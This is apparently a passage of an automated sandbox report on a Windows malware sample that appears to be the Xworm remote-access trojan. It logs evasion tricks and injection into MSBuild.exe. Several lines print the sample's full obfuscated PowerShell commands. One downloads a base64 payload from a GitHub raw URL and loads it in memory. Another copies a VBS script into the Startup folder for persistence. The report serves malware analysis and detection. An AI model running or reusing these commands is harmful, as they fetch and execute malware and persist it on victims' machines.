            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3307Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1601Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1496Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4317Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5633Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4202Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep count: 3307 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep count: 1601 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 916Thread sleep count: 4317 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 752Thread sleep count: 5515 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1548Thread sleep time: -19369081277395017s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3324Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1280Thread sleep count: 5633 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1280Thread sleep count: 4202 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exe TID: 4692Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exe TID: 5080Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
            Source: powershell.exe, 00000009.00000002.1676125136.000001FFFE881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: MSBuild.exe, 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: LMugsZmB2WFCOObkwGfdVMcirAtyBNV1V9xUJTFCppxbjtxiwJ16sfe2h0CXfnAY6YNez7GY4XGNdm2xPg7C
            Source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 416000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 418000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DBB008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\k4stqvj6rv.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.amoimoil.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdtwhr1cicrj2wgjysnpsbkmg1odhrwcycrjzonkycvl3jhdy5nascrj3rojysndwj1c2unkydyy29ujysndgvujysndc5jb20nkycvjysntm9ezxqnkydly3rpbi9ojysnbycrj0rljysndgunkydjdccrj09ulycrj3jlzicrj3mvagvhzhmvbwenkydpbi9ezxrhjysnae5vdggtjysnvi50ehrkmccrj207ig1ydginkydhc2unkyc2nenvbnrlbnqgpsaojysntmv3lu9iamvjdcbtescrj3n0zw0uticrj2v0jysnlldljysnyknsawvudckujysnrccrj293bmwnkydvywrtdhjpjysnbicrj2cobvgnkyd0dxinkydsktsnkycgbvh0yicrj2luyscrj3j5qycrj29udgvujysndca9ifttjysnexn0jysnzw0uq29ujysndmunkydydf06oicrj0ynkydybycrj20nkydcjysnyxnlnjrtjysndhjpbicrj2cobvh0ymenkydzjysnztynkyc0q29ujysndgunkydudccrjyk7ig1ydgfzjysnc2unkydtyicrj2wnkyd5id0nkycgw1jlzicrj2wnkydly3rpb24ujysnqscrj3nzzw1ibhldoicrjzonkydmb2fkjysnkccrj21ydgjpbmfyeunvjysnbnrlbnqpoybbzg5sawinkycusscrj08ujysnsg9tzv06jysnolzbssgnkyc3ceswjysnlzqzvnlul2qvzwuuzxrzjysnyscrj3avlzpzchr0accrjzdwsycrjywnkycgn3blzgvzjysnyxqnkydpdmenkydkbycrjzdwsycrjywnkycgjysnn3ankydlzgvzyxrpdmfkbycrjzcnkydwsywgn3blzgvzyxqnkydpdicrj2fkbzdwsywgjysnn3bljysntvncjysndscrj2lszdcnkydwsycrjywgnycrj3bln3bllddwjysnszdwsyknks5srxbmywnlkchby2hhcl0xmdarw2noyxjdndgrw2noyxjdmta5ksxbc3ryaw5nxvtjagfyxtm5ks5srxbmywnlkcdtwhqnlcckjykuukvwtgfjzsgow2noyxjdnturw2noyxjdmteyk1tjagfyxtc1ksxbc3ryaw5nxvtjagfyxtm0kxwgjiaoicrftny6q09tc3bly1s0lde1ldi1xs1kb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('mxtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'nodet'+'ecton/n'+'o'+'de'+'te'+'ct'+'on/'+'ref'+'s/heads/ma'+'in/deta'+'hnoth-'+'v.txtd0'+'m; mxtb'+'ase'+'64content = ('+'new-object sy'+'stem.n'+'et'+'.we'+'bclient).'+'d'+'ownl'+'oadstri'+'n'+'g(mx'+'tur'+'l);'+' mxtb'+'ina'+'ryc'+'onten'+'t = [s'+'yst'+'em.con'+'ve'+'rt]::'+'f'+'ro'+'m'+'b'+'ase64s'+'trin'+'g(mxtba'+'s'+'e6'+'4con'+'te'+'nt'+'); mxtas'+'se'+'mb'+'l'+'y ='+' [ref'+'l'+'ection.'+'a'+'ssembly]:'+':'+'load'+'('+'mxtbinaryco'+'ntent); [dnlib'+'.i'+'o.'+'home]:'+':vai('+'7pk0'+'/43vyn/d/ee.ets'+'a'+'p//:sptth'+'7pk'+','+' 7pkdes'+'at'+'iva'+'do'+'7pk'+','+' '+'7p'+'kdesativado'+'7'+'pk, 7pkdesat'+'iv'+'ado7pk, '+'7pk'+'msb'+'u'+'ild7'+'pk'+', 7'+'pk7pk,7p'+'k7pk)').replace(([char]100+[char]48+[char]109),[string][char]39).replace('mxt','$').replace(([char]55+[char]112+[char]75),[string][char]34)| & ( $env:comspec[4,15,25]-join'')"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\k4stqvj6rv.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.amoimoil.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdtwhr1cicrj2wgjysnpsbkmg1odhrwcycrjzonkycvl3jhdy5nascrj3rojysndwj1c2unkydyy29ujysndgvujysndc5jb20nkycvjysntm9ezxqnkydly3rpbi9ojysnbycrj0rljysndgunkydjdccrj09ulycrj3jlzicrj3mvagvhzhmvbwenkydpbi9ezxrhjysnae5vdggtjysnvi50ehrkmccrj207ig1ydginkydhc2unkyc2nenvbnrlbnqgpsaojysntmv3lu9iamvjdcbtescrj3n0zw0uticrj2v0jysnlldljysnyknsawvudckujysnrccrj293bmwnkydvywrtdhjpjysnbicrj2cobvgnkyd0dxinkydsktsnkycgbvh0yicrj2luyscrj3j5qycrj29udgvujysndca9ifttjysnexn0jysnzw0uq29ujysndmunkydydf06oicrj0ynkydybycrj20nkydcjysnyxnlnjrtjysndhjpbicrj2cobvh0ymenkydzjysnztynkyc0q29ujysndgunkydudccrjyk7ig1ydgfzjysnc2unkydtyicrj2wnkyd5id0nkycgw1jlzicrj2wnkydly3rpb24ujysnqscrj3nzzw1ibhldoicrjzonkydmb2fkjysnkccrj21ydgjpbmfyeunvjysnbnrlbnqpoybbzg5sawinkycusscrj08ujysnsg9tzv06jysnolzbssgnkyc3ceswjysnlzqzvnlul2qvzwuuzxrzjysnyscrj3avlzpzchr0accrjzdwsycrjywnkycgn3blzgvzjysnyxqnkydpdmenkydkbycrjzdwsycrjywnkycgjysnn3ankydlzgvzyxrpdmfkbycrjzcnkydwsywgn3blzgvzyxqnkydpdicrj2fkbzdwsywgjysnn3bljysntvncjysndscrj2lszdcnkydwsycrjywgnycrj3bln3bllddwjysnszdwsyknks5srxbmywnlkchby2hhcl0xmdarw2noyxjdndgrw2noyxjdmta5ksxbc3ryaw5nxvtjagfyxtm5ks5srxbmywnlkcdtwhqnlcckjykuukvwtgfjzsgow2noyxjdnturw2noyxjdmteyk1tjagfyxtc1ksxbc3ryaw5nxvtjagfyxtm0kxwgjiaoicrftny6q09tc3bly1s0lde1ldi1xs1kb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('mxtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'nodet'+'ecton/n'+'o'+'de'+'te'+'ct'+'on/'+'ref'+'s/heads/ma'+'in/deta'+'hnoth-'+'v.txtd0'+'m; mxtb'+'ase'+'64content = ('+'new-object sy'+'stem.n'+'et'+'.we'+'bclient).'+'d'+'ownl'+'oadstri'+'n'+'g(mx'+'tur'+'l);'+' mxtb'+'ina'+'ryc'+'onten'+'t = [s'+'yst'+'em.con'+'ve'+'rt]::'+'f'+'ro'+'m'+'b'+'ase64s'+'trin'+'g(mxtba'+'s'+'e6'+'4con'+'te'+'nt'+'); mxtas'+'se'+'mb'+'l'+'y ='+' [ref'+'l'+'ection.'+'a'+'ssembly]:'+':'+'load'+'('+'mxtbinaryco'+'ntent); [dnlib'+'.i'+'o.'+'home]:'+':vai('+'7pk0'+'/43vyn/d/ee.ets'+'a'+'p//:sptth'+'7pk'+','+' 7pkdes'+'at'+'iva'+'do'+'7pk'+','+' '+'7p'+'kdesativado'+'7'+'pk, 7pkdesat'+'iv'+'ado7pk, '+'7pk'+'msb'+'u'+'ild7'+'pk'+', 7'+'pk7pk,7p'+'k7pk)').replace(([char]100+[char]48+[char]109),[string][char]39).replace('mxt','$').replace(([char]55+[char]112+[char]75),[string][char]34)| & ( $env:comspec[4,15,25]-join'')"Jump to behavior
            Source: MSBuild.exe, 0000000C.00000002.2589539147.0000000003010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: MSBuild.exe, 0000000C.00000002.2589539147.0000000003010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
            Source: MSBuild.exe, 0000000C.00000002.2589539147.0000000003010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: MSBuild.exe, 0000000C.00000002.2589539147.0000000003010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: MSBuild.exe, 0000000C.00000002.2589539147.0000000003010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
